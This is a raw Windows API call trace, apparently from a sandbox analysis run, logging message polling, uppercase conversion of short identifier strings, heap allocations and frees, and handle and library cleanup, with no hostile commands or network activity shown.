[0207.089] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.089] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.089] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.089] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.089] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.089] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.089] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.089] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.089] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.089] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.089] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.090] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.090] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.090] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.090] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.090] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.090] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.090] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.090] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.090] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.090] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.090] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.090] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.090] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.090] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.091] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.091] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.093] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0207.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0207.093] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0207.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.094] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0207.094] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0207.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0207.095] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.095] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.096] FreeLibrary (hLibModule=0x74d40000) returned 1 [0207.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0207.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.096] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0207.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0207.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0207.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0207.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0207.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0207.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.098] CloseHandle (hObject=0x268) returned 1 [0207.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0207.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0207.100] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0207.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.102] CloseHandle (hObject=0x1f8) returned 1 [0207.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0207.113] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.113] 